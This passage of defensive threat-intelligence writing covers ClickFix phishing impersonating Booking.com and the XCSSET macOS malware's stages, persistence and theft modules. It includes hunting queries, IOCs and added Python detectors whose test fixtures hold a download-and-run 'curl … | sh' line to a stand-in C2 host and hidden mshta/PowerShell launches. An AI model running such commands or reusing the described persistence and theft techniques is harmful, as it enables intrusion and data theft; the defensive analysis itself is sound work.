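    # A bare "cmd" or "powershell" is ordinary admin use; the ClickFix shape is
    # a LOLBin combined with a download or an obfuscated command line.
    return ["launches " + binary] + reasons if reasons else []


def find_clickfix(values: dict) -> list:
    """Run classify() over every RunMRU entry and collect the suspicious ones."""
    findings = []
    for name, command in parse_runmru(values):
        reasons = classify(command)
        if reasons:
            findings.append(Finding(name, command, reasons))
    return findings


# Constructed RunMRU contents: three ordinary entries and two ClickFix-style pastes.
SAMPLE_RUNMRU = {
    "MRUList": "edcba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": "cmd\\1",
    "d": "mshta https://captcha-verify.example.invalid/check\\1",
    "e": "powershell -w hidden -enc <BASE64-PLACEHOLDER>\\1",
}

if __name__ == "__main__":
    for f in find_clickfix(SAMPLE_RUNMRU):
        print(f"RunMRU\\{f.value_name}: {f.command!r} -> {', '.join(f.reasons)}")
```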

All these payloads include capabilities to steal financial data and credentials for fraudulent use, which is a hallmark of Storm-1865 activity. In 2023, Storm-1865 targeted hotel guests using Booking.com with similar social engineering techniques and malware. In 2024, Storm-1865 targeted buyers using e-commerce platforms with phishing messages leading to fraudulent payment webpages. The addition of ClickFix to this threat actor’s tactics, techniques, and procedures (TTPs) shows how Storm-1865 is evolving its attack chains to try to slip through conventional security measures against phishing and malware.

Figure 6. Diagram illustrating the stages of the infection process in this campaign.

Attribution

The threat actor that Microsoft tracks as Storm-1865 encapsulates a cluster of activity conducting phishing campaigns, leading to payment data theft and fraudulent charges. These campaigns have been ongoing with increased volume since at least early 2023 and involve messages sent through vendor platforms, such as online travel agencies and e-commerce platforms, and email services, such as Gmail or iCloud Mail.

Recommendations

Users can follow the recommendations below to spot phishing activity. Organizations can reduce the impact of phishing attacks by educating users on recognizing these scams.

Check the sender’s email address to ensure it’s legitimate. Assess whether the sender is categorized as first-time, infrequent, or marked as “[External]” by your email provider. Hover over the address to ensure that the full address is legitimate. Keep in mind that legitimate organizations do not send unsolicited email messages or make unsolicited phone calls to request personal or financial information. Always navigate to those organizations directly to sign into your account.

Contact the service provider directly. If you receive a suspicious email or message, contact the service provider directly using official contact forms listed on the official website.

Be wary of urgent calls to action or threats. Remain cautious of email notifications that call to click, call, or open an attachment immediately. Phishing attacks and scams often create a false sense of urgency to trick targets into acting without first scrutinizing the message’s legitimacy.

Hover over links to observe the full URL. Sometimes, malicious links are embedded into an email to trick the recipient. Simply clicking the link could let a threat actor download malware onto your device. Before clicking a link, ensure the full URL is legitimate. For best practice, rather than following a link from an email, search for the company website directly in your browser and navigate from there.

Search for typos. Phishing emails often contain typos, including within the body of the email, indicating that the sender is not a legitimate, professional source, or within the email domain or URL, as mentioned previously. Companies rarely send out messages without proofreading content, so multiple spelling and grammar mistakes can signal a scam message. In addition, check for very subtle misspellings of legitimate domains, a technique known as typosquatting. For example, you might see micros0ft[.]com, where the second o has been replaced by 0, or rnicrosoft[.]com, where the m has been replaced by r and n.

Microsoft recommends the following mitigations to reduce the impact of this threat.

  • Pilot and deploy phishing-resistant authentication methods for users.
  • Enforce multi-factor authentication (MFA) on all accounts, remove users excluded from MFA, and strictly require MFA from all devices in all locations at all times.
  • Configure Microsoft Defender for Office 365 to recheck links on click. Safe Links provides URL scanning and rewriting of inbound email messages in mail flow, and time-of-click verification of URLs and links in email messages, other Microsoft 365 applications such as Teams, and other locations such as SharePoint Online. Safe Links scanning occurs in addition to the regular anti-spam and anti-malware protection in inbound email messages in Microsoft Exchange Online Protection (EOP). Safe Links scanning can help protect your organization from malicious links used in phishing and other attacks.
  • Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
  • Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attack tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
  • Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
  • Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
  • Enable Zero-hour auto purge (ZAP) in Office 365 to quarantine sent mail in response to newly acquired threat intelligence and retroactively neutralize malicious phishing, spam, or malware messages that have already been delivered to mailboxes.

Microsoft Defender XDR customers can turn on attack surface reduction rules to prevent common attack techniques:

Detection details

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

Microsoft Defender for Endpoint

The following alerts might indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity:

  • Suspicious command in RunMRU registry
  • Suspicious PowerShell command line
  • Use of living-off-the-land binary to run malicious code
  • Possible theft of passwords and other sensitive web browser information
  • Suspicious DPAPI Activity
  • Suspicious mshta process launched
  • Suspicious phishing activity detected

Microsoft Defender for Office 365

Microsoft Defender for Office 365 detects malicious activity associated with this threat through the following alerts:

  • This URL has known registrant pattern for malicious activity.
  • This URL impersonates booking.com
  • This PDF has generic phishing traits.
  • This URL has generic phishing traits.

Microsoft Security Copilot

Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:

  • Incident investigation
  • Microsoft User analysis
  • Threat actor profile
  • Threat Intelligence 360 report based on MDTI article
  • Vulnerability impact assessment

Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

Network connections to known C2 infrastructure related to this activity

Look for network connections with known C2 infrastructure.

let c2Servers = dynamic(['92.255.57.155','147.45.44.131','176.113.115.170','31.177.110.99','185.7.214.54','176.113.115.225','87.121.221.124','185.149.146.164']);
DeviceNetworkEvents
| where RemoteIP has_any(c2Servers)
| project Timestamp, DeviceId, DeviceName, LocalIP, RemoteIP, InitiatingProcessFileName, InitiatingProcessCommandLine

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Below are the queries using Sentinel Advanced Security Information Model (ASIM) functions to hunt threats across both Microsoft first-party and third-party data sources. ASIM also supports deploying parsers to specific workspaces from GitHub, using an ARM template or manually.

Hunt normalized Network Session events using the ASIM unifying parser _Im_NetworkSession for IOCs:

let lookback = 30d;
let ioc_ip_addr = dynamic(['92.255.57.155','147.45.44.131','176.113.115.170','31.177.110.99','185.7.214.54','176.113.115.225','87.121.221.124','185.149.146.164']);
// The IOC table in this post lists IP addresses and file hashes only, so the
// filter on an undefined ioc_domains list has been dropped; the query matches on destination IP.
_Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstIpAddr in (ioc_ip_addr)
| summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor

Hunt normalized Web Session events using the ASIM unifying parser _Im_WebSession for IOCs:

let lookback = 30d;
let ioc_ip_addr = dynamic(['92.255.57.155','147.45.44.131','176.113.115.170','31.177.110.99','185.7.214.54','176.113.115.225','87.121.221.124','185.149.146.164']);
_Im_WebSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstIpAddr has_any (ioc_ip_addr)
| summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor

Hunt normalized File events using the ASIM unifying parser imFileEvent for IOCs:

let ioc_sha_hashes = dynamic(["01ec22c3394eb1661255d2cc646db70a66934c979c2c2d03df10127595dc76a6","f87600e4df299d51337d0751bcf9f07966282be0a43bfa3fd237bf50471a981e","0c96efbde64693bde72f18e1f87d2e2572a334e222584a1948df82e7dcfe241d"]);
imFileEvent
| where SrcFileSHA256 in (ioc_sha_hashes) or TargetFileSHA256 in (ioc_sha_hashes)
| extend AccountName = tostring(split(User, @'\')[1]), AccountNTDomain = tostring(split(User, @'\')[0])
| extend AlgorithmType = "SHA256"

Indicators of compromise

  • 92.255.57[.]155 (IP address): C2 server delivering XWorm
  • 147.45.44[.]131 (IP address): C2 server delivering Danabot
  • 176.113.115[.]170 (IP address): C2 server delivering LummaStealer
  • 31.177.110[.]99 (IP address): C2 server delivering Danabot
  • 185.7.214[.]54 (IP address): C2 server delivering XWorm
  • 176.113.115[.]225 (IP address): C2 server delivering LummaStealer
  • 87.121.221[.]124 (IP address): C2 server delivering Danabot
  • 185.149.146[.]164 (IP address): C2 server delivering AsyncRAT
  • 01ec22c3394eb1661255d2cc646db70a66934c979c2c2d03df10127595dc76a6 (File hash, SHA-256): Danabot malware
  • f87600e4df299d51337d0751bcf9f07966282be0a43bfa3fd237bf50471a981e (File hash, SHA-256): Danabot malware
  • 0c96efbde64693bde72f18e1f87d2e2572a334e222584a1948df82e7dcfe241d (File hash, SHA-256): Danabot malware

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://x.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware appeared first on Microsoft Security Blog.

Categories: Microsoft

New XCSSET malware adds new obfuscation, persistence techniques to infect Xcode projects

Microsoft Malware Protection Center - Tue, 03/11/2025 - 12:00pm

Microsoft Threat Intelligence has uncovered a new variant of XCSSET, a sophisticated modular macOS malware that infects Xcode projects, in the wild during routine threat hunting. Its first known variant since 2022, this latest XCSSET malware features enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies. These enhanced features help this malware family steal and exfiltrate files and system and user information, such as digital wallet data and notes, among others.

XCSSET is known for infecting Xcode projects and runs while an Xcode project is being built. Since Xcode is typically used by software developers, we assess that the malware’s mode of infection and propagation relies on project files being shared among developers building Apple or macOS-related applications.

While it has resemblances to older XCSSET variants, this new variant is characterized by its modular approach and encoded payloads. It also has improved error handling, and heavily uses scripting languages, UNIX commands, and legitimate binaries. These characteristics allow the malware to have a low profile on an affected device and even remain fileless whenever possible, thus making its detection and removal more challenging.

At the code level, the new XCSSET variant obfuscated its module names, making it difficult to determine the modules’ intent during static analysis. Its enhanced obfuscation techniques extend to its randomized approach for generating payloads to infect Xcode projects and for encoding its payloads. In addition, while older XCSSET variants only used xxd (hexdump) for encoding, the latest one also incorporates Base64. Other notable capabilities of this new variant include its three distinct persistence techniques, which ensure its payload launches whenever a new shell session is initiated or whenever a user is tricked into opening a fake Launchpad application or makes commits in Git, and a new infection method for where the malware places its payload in a target Xcode project. Our analysis also revealed that there are some modules in this new variant’s code that appear to be under development. Its command-and-control (C2) server is also active as of this writing and is downloading additional modules.

In this blog, we discuss how this variant’s different modules work together in achieving the malware’s goals. As part of Microsoft’s commitment to work with the security community to mitigate threats and improve security for all, we have shared these findings with Apple, who acknowledged and thanked us for the information. While we’re only seeing this new XCSSET variant in limited attacks as of this writing, we’re sharing our comprehensive analysis and providing best practices and recommendations more broadly so users and organizations can protect themselves against this threat.

Analyzing the latest XCSSET variant

The new XCSSET variant generally follows a four-stage infection chain, with the fourth-stage payload running various sub-routines. The following sections provide detailed descriptions of each of these modules.

First stage: Xcode shell payload

The payload referenced in this stage gets launched when a user unknowingly builds an infected Xcode project. This obfuscated payload passes through three iterations of a hex decoder and is then piped—or served as input—to shell.

Figure 1. Obfuscated first-stage shell payload

The decoded payload simply makes a curl request to a C2 server, https[:]//bulknames[.]ru/a. The response it receives is then piped to shell.

Second stage: Obfuscated shell command

This payload, which was downloaded by the first-stage shell, collects the affected user’s device operating system information, which it then sends to the C2 server along with a default identifier/tag to download an additional payload. It then pipes the downloaded payload to the shell for execution.

Figure 2. The second-stage command sent to the C2 server

Third stage: Downloaded shell payload

This stage again involves a shell script that first checks if the device’s version of XProtect, the built-in antivirus in macOS, is less than 5287. This check is done by running the command “xprotect version” and reading the Info.plist file of the XProtect bundle.

Figure 3. Third-stage shell script

The script then checks and stops any of the referenced processes in Figure 3 and any running osascript processes. It then calculates the date and searches for a hidden file named .a in the home folder. If it finds the file, it updates the said file; otherwise, it creates a new file with the date and other counters/markers.

The script then deletes any existing references to /tmp/l.app and creates a new one. It then downloads another script from the C2 server and saves it at the location /tmp/b. Next, it creates an AppleScript compiled application using osacompile. This AppleScript payload launches the downloaded /tmp/b script.

The script then uses the plutil command to modify the Info.plist file of the created AppleScript application to enable the LSUIElement key. Enabling this key hides the application from the Dock, effectively making the application more of a background process. Finally, the script runs the application in the background, sleeps for 10 seconds, and removes the created application and the /tmp/b script.

Fourth stage: AppleScript payload (/tmp/b or looz)

The fourth stage involves the execution of the created AppleScript application, which essentially runs a shell command. This command passes a Base64-encoded blob through several iterations of a Base64 decoder to obtain the final script, which is subsequently executed.

Figure 4. Base64-encoded fourth-stage AppleScript payload

The decoded script is another AppleScript that first parses the com.apple.launchservices.secure.plist file to determine the default browser for https URLs. It searches for the “https” URL scheme and extracts the corresponding browser’s bundle identifier. The script has explicitly set the variable to “Safari (com.apple.safari)” by default.

The script then fetches the following system information, which it sends to the C2 server as a single string:

  • macOS version
  • Safari version
  • User locale
  • Firewall status
  • System Integrity Protection (SIP) status
  • CPU information

The script also overrides the default log() function so that it can send logs to the C2 server—a capability that can also be seen across the various sub-modules the script launches. The next section provides more information about the sub-modules the script downloads from the C2 server as of this writing.  

The script then checks if the user name is “demo,” possibly to verify if the user account belongs to the threat actor. If the user name checks out, the script processes a specific module, cozfi_xhh, and returns. It also checks the device serial number and exits if the value contains “JV3Q” in it. Next, it calls the boot() function repeatedly with multiple obfuscated module names.

Figure 5. The boot() function of the AppleScript payload

The boot() function has multiple filters with predefined logic and handlers for the module names passed in the argument. In case the module name doesn’t pass any filter, a code in the boot() function downloads an AppleScript that is then launched directly to avoid any artifacts on the disk. Depending on the wait flag passed to this function, the newly downloaded AppleScript is run in either background or foreground.

Sub-modules

The sub-modules that the fourth-stage script downloads follow a similar format, where a Base64-encoded blob is passed through multiple iterations of a Base64 decoder before being launched directly.

Figure 6. Format of the encoded sub-modules

seizecj (Steals system information)

This sub-module exfiltrates system information to the C2 server. The information it retrieves includes:

  • Applications list
  • System applications list
  • User level LaunchAgents list
  • XProtect version
  • Malware Removal Tool (MRT) version

fpzfcieoci (Lists browser extensions)

This sub-module searches for and lists down the various internet browser extensions it finds installed on the affected device. It has a predefined list of search strings that correspond to the folder paths and files of the browsers that it searches for:

Figure 7. Browser’s path list

This sub-module processes each path individually to search for specific files and extracts metadata about the browser extensions. For example, for Firefox, it extracts lines containing “extensions.webextensions.ExtensionStorageIDB” from the prefs.js file. For the other browsers, it searches the manifest.json file and extracts the lines containing either “default_title” or “name”. It then stores the extension list in a log file named /tmp/out.txt and uploads this file to the C2 server.

hxasoxtfd (Downloads an additional module)

This sub-module is a downloader that requests a module name from the C2 server every 120 seconds.

Figure 8. doMain() function of the module

If a module name is received from the C2 server, the system proceeds to call the boot() function with the received module name. This function includes filters on the module name, similar to those observed in the parent (fourth-stage) payload. If the filters don’t pass, this sub-module downloads and launches the payload received from the C2 directly, again to avoid any artifacts on the disk.

txzx_vostfdi (Steals digital wallet data from browsers)

This sub-module first sends a request to retrieve a path list from the C2 server. The following screenshot is an example of a path list received from the C2:

Figure 9. Path list received from C2 server

Based on the specified paths, this sub-module appears to search for many cryptocurrency digital wallet extensions across various browsers and their directories. This information is primarily determined by examining the identifiers, such as the following:

  • MetaMask: nkbihfbeogaeaoehlefnkodbefgpgknn, ejbalbakoplchlghecdalmeeeajnimhm
  • TokenPocket: mfgccjchihfkkindfppnaooecgfneiii
  • TronLink: ibnejdfjmmkpcnlpebklmnkoeoihofec
  • BNB Chain Wallet: fhbohimaelbohpjbbldcngcnapndodjp
  • Phantom Wallet: bfnaelmomeimhlpmgjnjophhpkkoljpa

This sub-module archives the collected data, which it then sends back to the C2 server.

hfdieiz (Establishes persistence)

This sub-module establishes persistence through two different methods, zshrc and Dock, which will be discussed in the following sections. It first creates a folder named com.apple.finder in the ~/Library/Caches/ directory.

This sub-module generates its payload by randomly selecting a C2 server from a predefined list and selecting an encoding method, which is either Base64 or xxd. It then chooses the number of iterations used to encode, and therefore to decode, the payload. The final encoded payload is then generated and returned. The argument received in the function is placed as a marker at “p=” in the payload request.

Figure 10. Payload generation function of the persistence sub-module
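Both the first-stage payload (three rounds of hex decoding piped to the shell) and the persistence module's generator (Base64 or xxd, with a random iteration count) produce blobs whose decoding recipe an analyst does not know in advance. The following Python is an added example, not Microsoft's code: it detects each layer's alphabet, peels it, and stops when the result is no longer an encoded layer. The sample blobs are constructed here, with a placeholder C2 hostname.

```python
"""Peel the layered xxd/Base64 encoding that XCSSET wraps its payloads in.

Added example, not Microsoft's code. The post describes the first stage as
three rounds of hex decoding piped to the shell, and the persistence module
as choosing Base64 or xxd and a random iteration count. This decoder detects
each layer's alphabet, decodes it, and stops when the output is plain text
that is not itself another layer. The sample payloads are constructed here;
the hostname is a placeholder.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
MAX_LAYERS = 32  # guard against pathological input


@dataclass
class Unwrapped:
    layers: list = field(default_factory=list)  # outermost layer first
    payload: str = ""


def _is_text(data: bytes):
    """Return the decoded string if data is printable UTF-8 (newlines/tabs allowed), else None."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if text and all(ch.isprintable() or ch in "\n\r\t" for ch in text):
        return text
    return None


def _decode_once(text: str):
    """Try to strip one encoding layer; return (kind, inner_text) or None."""
    compact = re.sub(r"\s+", "", text)  # xxd and base64 output may be line-wrapped
    attempts = []
    # Hex is tried first: every hex string is also a valid Base64 alphabet string.
    if HEX_RE.match(compact) and len(compact) % 2 == 0:
        attempts.append(("hex", lambda: bytes.fromhex(compact)))
    if B64_RE.match(compact) and len(compact) % 4 == 0:
        attempts.append(("base64", lambda: base64.b64decode(compact, validate=True)))
    for kind, decode in attempts:
        try:
            inner = _is_text(decode())
        except (ValueError, binascii.Error):
            continue
        if inner is not None:
            return kind, inner
    return None


def unwrap(blob: str) -> Unwrapped:
    """Decode nested hex/Base64 layers until plain text (e.g. a shell script) remains."""
    result = Unwrapped(payload=blob)
    for _ in range(MAX_LAYERS):
        step = _decode_once(result.payload)
        if step is None:
            break
        kind, inner = step
        result.layers.append(kind)
        result.payload = inner
    return result


def wrap(text: str, layers: list) -> str:
    """Build a test fixture: apply each encoding in order (first = innermost)."""
    out = text
    for kind in layers:
        raw = out.encode("utf-8")
        out = raw.hex() if kind == "hex" else base64.b64encode(raw).decode("ascii")
    return out


# Constructed stand-ins for the stage-one and persistence payloads (placeholder C2 host).
PAYLOAD = "curl -s https://c2.example.invalid/a | sh\n"
STAGE1_SAMPLE = wrap(PAYLOAD, ["hex", "hex", "hex"])
MIXED_SAMPLE = wrap(PAYLOAD, ["base64", "base64", "hex"])

if __name__ == "__main__":
    for name, blob in (("stage1", STAGE1_SAMPLE), ("mixed", MIXED_SAMPLE)):
        r = unwrap(blob)
        print(f"{name}: {len(r.layers)} layers {r.layers} -> {r.payload.strip()!r}")
```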

zshrc method

In this persistence method, the sub-module first checks the value of the RESTORE_DEFAULT global variable. If the value is set to “True”, the sub-module deletes the ~/.zshrc_aliases file; otherwise, it retrieves the payload body and saves it to the ~/.zshrc_aliases file. The subsequent payload involves verifying the existence of the .zshrc_aliases file and executing it if it is present. The script then ensures that the ~/.zshrc file exists. It searches for the presence of the string “.zshrc_aliases” within this file and appends the final payload if it is absent. This persistence method guarantees the execution of the payload whenever a new shell session is created.

Figure 11. zshrc persistence method

Dock method

In this persistence method, the sub-module first downloads a signed dockutil tool from the C2 server. This tool is mainly used to manage dock items, such as adding, deleting, and updating entries. The sub-module then gets the list of dock items and searches for Launchpad in it. If it finds an entry, it proceeds to call the processItem function, which then creates a fake Launchpad application in the ~/Library/Caches/com.apple.finder folder.

Figure 12. Creation of the fake Launchpad application and file URI replacement

The processItem function proceeds to get the corresponding payload application body from getPayloadForApp() function, which then initially verifies whether the passed application name is “Launchpad.” If it is, then the payload body for Launchpad is retrieved using the getPayloadBody() function.

In the getPayloadForApp() function, the final payload is configured to first invoke the legitimate Launchpad application and then launch the generated malicious payload. The final payload body is then returned to the processItem function.

Figure 13. Function to create payload for the application

The processItem function also has logic to update the persisted payload in case it is already found on the device. If the device has no prior infection, the function first compiles an AppleScript payload to an application with the “run-only” flag. This flag makes the code harder to reverse engineer and helps it evade static analysis. The function then saves the payload to a file in the parent directory. Next, it checks if the application name is “Launchpad” and, if it is, modifies the Info.plist file’s entries to enable the LSUIElement key and update CFBundleDisplayName. It then downloads InfoPlist.locatable and Launchpad’s icon from the C2 server, replaces the created application’s icon with it, and performs an ad-hoc signing on the application.

Finally, the processItem function uses the dockutil binary to replace the existing Launchpad entry with the fake Launchpad’s application path. It does this by replacing the file URI entry of the legitimate Launchpad application with the fake one. These steps ensure that every time the user starts Launchpad from the dock, the malicious application is launched, which then runs both the legitimate Launchpad and the generated payload.
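A defender can check for both of the hfdieiz persistence methods from their on-disk artifacts: a Dock tile whose file URI no longer points at the system Launchpad bundle, and a hook in ~/.zshrc that executes ~/.zshrc_aliases. The following Python is an added example, not Microsoft's code; the Dock plist and .zshrc content are constructed samples, and the trusted application directories and home path are assumptions.

```python
"""Check a Mac for the two persistence footholds described above.

Added example, not Microsoft's code. It inspects (1) the Dock's persistent
apps for a tile such as "Launchpad" whose file URL has been redirected away
from the system bundle, and (2) ~/.zshrc for a hook that executes
~/.zshrc_aliases. Both inputs below are constructed samples; on a real host
you would read ~/Library/Preferences/com.apple.dock.plist and ~/.zshrc. The
trusted application directories and the home path are assumptions.
"""
import plistlib
import re
from urllib.parse import unquote, urlparse

HOME = "/Users/alice"  # constructed; use os.path.expanduser("~") on a live system
TRUSTED_APP_DIRS = ("/System/Applications/", "/Applications/", "/System/Library/CoreServices/")
ALIASES_HOOK = re.compile(r"\.zshrc_aliases")


def tile_path(tile: dict):
    """Return the filesystem path behind a dock tile's file:// URL, or None for non-app tiles."""
    url = tile.get("tile-data", {}).get("file-data", {}).get("_CFURLString")
    if not url:
        return None
    return unquote(urlparse(url).path).rstrip("/")


def audit_dock(plist_bytes: bytes) -> list:
    """Return (label, path, reason) for persistent-apps tiles that look hijacked."""
    dock = plistlib.loads(plist_bytes)
    findings = []
    for tile in dock.get("persistent-apps", []):
        path = tile_path(tile)
        if path is None:
            continue  # spacers and other non-file tiles
        label = tile.get("tile-data", {}).get("file-label", "?")
        if path.startswith(HOME + "/Library/Caches/") or "/." in path:
            findings.append((label, path, "app bundle lives in a cache or hidden directory"))
        elif not path.startswith(TRUSTED_APP_DIRS):
            findings.append((label, path, "app bundle outside the standard application folders"))
    return findings


def audit_zshrc(text: str) -> list:
    """Return the non-comment ~/.zshrc lines that reference ~/.zshrc_aliases (the zshrc method)."""
    return [line.strip() for line in text.splitlines()
            if ALIASES_HOOK.search(line) and not line.lstrip().startswith("#")]


def app_tile(label: str, path: str) -> dict:
    """Build a dock tile in the shape com.apple.dock.plist uses (test fixture)."""
    return {"tile-type": "file-tile",
            "tile-data": {"file-label": label,
                          "file-data": {"_CFURLString": "file://" + path + "/",
                                        "_CFURLStringType": 15}}}


# Constructed Dock plist: Safari and Terminal are untouched; Launchpad has been
# pointed at a fake bundle under ~/Library/Caches/com.apple.finder.
SAMPLE_DOCK = plistlib.dumps({"persistent-apps": [
    app_tile("Safari", "/Applications/Safari.app"),
    app_tile("Terminal", "/System/Applications/Utilities/Terminal.app"),
    app_tile("Launchpad", HOME + "/Library/Caches/com.apple.finder/Launchpad.app"),
    {"tile-type": "spacer-tile", "tile-data": {}},
]})

# Constructed ~/.zshrc: one ordinary alias plus an appended hook.
SAMPLE_ZSHRC = """export PATH="$HOME/bin:$PATH"
alias ll='ls -la'
# a .zshrc_aliases mention inside a comment should not count
[ -f ~/.zshrc_aliases ] && . ~/.zshrc_aliases
"""

if __name__ == "__main__":
    for label, path, reason in audit_dock(SAMPLE_DOCK):
        print(f"dock tile {label!r} -> {path}: {reason}")
    for line in audit_zshrc(SAMPLE_ZSHRC):
        print("zshrc hook:", line)
```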

cozfi_xhh (Steals notes from the Notes application)

This sub-module steals notes from the affected device’s Notes application through a JavaScript payload.

It initializes a variable named permissionApp with the path /Applications/Reminders.app, where the fake Reminders application is created, and a second path, /Applications/Reminders.app/Notes/, where the stolen notes are saved. It is important to note that the legitimate Reminders application can be found in the /System/Applications directory. The sub-module then removes the Notes folder if it exists inside the fake Reminders application. It also checks for the presence of the fake Reminders application on the device and creates one if it’s not present.

Figure 14. Creation of AppleScript-compiled application to launch a malicious JavaScript payload that steals notes

This sub-module creates an AppleScript-compiled application with the flag set to “Run only.” This application’s script launches the /tmp/.n file using osascript. The sub-module then downloads an icon file from the C2 server. Next, it modifies the Info.plist file by updating the CFBundleDisplayName and CFBundleExecutable and enabling the LSUIElement key. Finally, it performs an ad-hoc signing for this newly created application.

After the creation of the application, the sub-module checks the global variable FORCED flag, which is set to “False” by default in the script. If the FORCED flag is set to “True”, the sub-module calls the exec function directly. Otherwise, it first sends a request to the C2 server to obtain a folder list. The code expects to receive “notes_app” in the response. If this application is present, it enters a loop, waiting for the Notes application to start before calling the exec function. The exec function then subsequently calls the runloop function.

The runloop function first sets the payload, which is JavaScript code. The run() function of the JavaScript payload first checks and connects to the Notes application present in the System directory, retrieves all notes, and saves each note’s contents, creation date, and modification date into an HTML file in the Notes folder within the Reminders application created previously.

Figure 15. JavaScript payload that steals notes from the affected device

The sub-module saves the JavaScript payload into the /tmp/.n file. It then launches the Reminders application to run the said payload. It checks for the existence of the Notes folder and, if absent, retries up to three times by resetting the Transparency, Consent, and Control (TCC) database for AppleEvents before deleting the created Reminders application. If the Notes folder exists, it returns a “200” code. When the sub-module’s parent function receives the said “200” code, it archives the Notes folder within the created fake Reminders application and exfiltrates it to the C2 server.

Figure 16. Retry method of resetting TCC database

Modules listed under finderModules list in boot() function

In the boot() function of the fourth-stage AppleScript module, there is a specific handler code for certain modules found under the finderModules list.

Figure 17. Handler for modules defined in finderModules list

Figure 17 shows how the fourth-stage payload downloads the module passed to the boot() function into the /tmp/.f file. It then calls the boot() function again with a specific module named vectfd_xhh.

Let’s first look at the common module invoked for each of the other modules on the list.

vectfd_xhh (Launches application for modules)

In this module, the doMain() function checks for the existence of either Xcode or Git. If either application is found, several global variables are set with the corresponding application’s display name, file path, and icon name.

Figure 18. Selection of launcher application for creation

If neither application is present, the module defaults to Finder.app. Subsequently, the doInstall() function is called for each case. It should be noted that the legitimate Finder and Terminal applications are located in the /System/Applications/ folder and not in /Applications/.

In the doInstall() function, the existence and version of the fake application in context is first checked. If the fake application isn’t present or is outdated:

  • If the current process in context is Xcode or Finder, the module waits for the corresponding legitimate application to launch first before calling the createLoop() function
  • If the current process in context is Terminal, the module directly calls the createLoop() function

The createLoop() function deletes any prior copy of the application before creating the fake one. The created application is AppleScript-compiled with the flag set to “Run only,” and it executes a script located at /tmp/.i. As with the previous fake application-creating modules, the created application’s icon and plist entries are modified, and it is ad-hoc signed.

Figure 19. Payload of the launcher application that launches the main module to be executed

The module then calls the runAppFile() function. This function first sets a payload where it attempts to get a listing of the user’s directories, possibly to check TCC permissions. If the command succeeds, this function deletes any existing error file (/tmp/.e); otherwise, it creates the file. The payload then launches the /tmp/.f file that was downloaded in the parent (fourth-stage) module.

Next, the runAppFile() function saves the payload it set initially into the /tmp/.i file and launches the created application. The created application in turn launches the /tmp/.i file, which in turn executes the /tmp/.f file.

If the directory listing command isn’t successful, the error file is created. If this error file exists, the function returns code “403”. If the parent function receives this code, it retrieves the CFBundleIdentifier of the created application, resets the TCC database for that bundle ID, and calls the createLoop() function again.
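As an added example that is not part of the Microsoft write-up, the following Python audit looks for the masquerading bundles described above: a Reminders, Terminal, Finder or Launchpad application outside /System/Applications, with LSUIElement enabled so it runs without a Dock icon, and a Notes directory inside the fake Reminders application. The function names, the default scan directories and the constructed bundles built by demo() are assumptions.

```python
import os
import plistlib
import tempfile

# Apple-shipped bundle names that the write-up saw being impersonated.
IMPERSONATED_NAMES = {"Reminders.app", "Terminal.app", "Finder.app", "Launchpad.app"}
# Locations where the write-up observed the fake bundles (assumed defaults).
DEFAULT_DIRS = ("/Applications", os.path.expanduser("~/Library/Caches/com.apple.finder"))


def read_info_plist(bundle):
    """Return the bundle's Contents/Info.plist as a dict, or None if unreadable."""
    path = os.path.join(bundle, "Contents", "Info.plist")
    try:
        with open(path, "rb") as fh:
            return plistlib.load(fh)
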